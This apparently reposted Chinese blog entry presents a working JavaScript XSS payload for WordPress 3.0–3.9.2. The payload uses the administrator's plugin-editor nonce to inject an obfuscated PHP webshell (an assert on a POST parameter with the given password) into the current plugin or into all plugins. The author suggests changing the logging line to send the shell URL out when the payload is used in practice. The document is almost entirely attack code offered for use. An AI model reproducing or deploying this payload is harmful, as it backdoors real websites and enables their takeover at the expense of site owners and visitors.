wordpress 3.0-3.9.2 XSS Getshell Payload(可Getshell当前模板也可以是全部插件模板)

来源：互联网发布：大数据hadoop面试题编辑：程序博客网时间：2024/05/31 04:03

0x_Jin

如果实战用记得把 console.lnfo 那一行该为发送喔。。。

密码：fuckxssQ
这个getshell js 有getshell当前模板跟getshell全部模板的功能
默认是getshell当前模板 StartGetshell = 0

如果要getshell全部插件模板把 StartGetshell的值改为1 即可

/*0x_Jin WordPress Getshell*/var a = location.href.split('/');var file = "";var xurl = location.href.replace(a[a.length-1],"plugin-editor.php");var file2 = [];var StartGetshell = 0;var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["fuckxssQ"]);';jQuery.ajax({  url: xurl,  type: 'GET',  dataType: 'html',  data: {},}).done(function(data) {  var temp = jQuery(data);  var Xtoken = "";  var Tmpcode = "";  temp.find('input#_wpnonce').each(function(i,o){    var o=jQuery(o);    Xtoken=o.attr('value');  });  temp.find('textarea#newcontent').each(function(i,o){    var o=jQuery(o);    Tmpcode = o.text().replace('<?php',shellcode);      })  temp.find('div.alignleft big strong').each(function(i,o){    var o=jQuery(o);    file = o.text();  })  temp.find('select#plugin option').each(function(i,o){    var o=jQuery(o);    file2.push(o.attr('value'));  })  if(Xtoken&&Tmpcode&&file){    jQuery.ajax({    url: xurl,    type: 'POST',    data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}    })    .done(function(){      var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);      console.info('Webshell：'+location.href.replace(temp,"wp-content/plugins/"+file));      return;    })    }  if(StartGetshell){    for(var i=0;i<file2.length;i++){      var filename = file2[i];      if(file2[i]!=file){        jQuery.ajax({          url: xurl,          type: 'POST',          data: {'plugin': file2[i],'Submit':'Select'},        })        .done(function(data) {          var NewCode = "";          var NewToken= "";          var Getshell=jQuery(data);          Getshell.find("textarea#newcontent").each(function(i,o){            var o=jQuery(o);            NewCode = o.text().replace('<?php',shellcode);              })          Getshell.find("input#_wpnonce").each(function(i,o){            var o=jQuery(o);            NewToken = o.attr('value');          })          if(NewCode&&NewToken){            console.log("1"+filename);            jQuery.ajax({            url: xurl,            type: 'POST',            data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}            })            .done(function(){              var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);              console.info('Webshell：'+location.href.replace(temp,"wp-content/plugins/"+filename));              return;            })            }        })            }    }  }}).fail(function() {  console.log("error");}).always(function() {  return;});

效果图：

0 0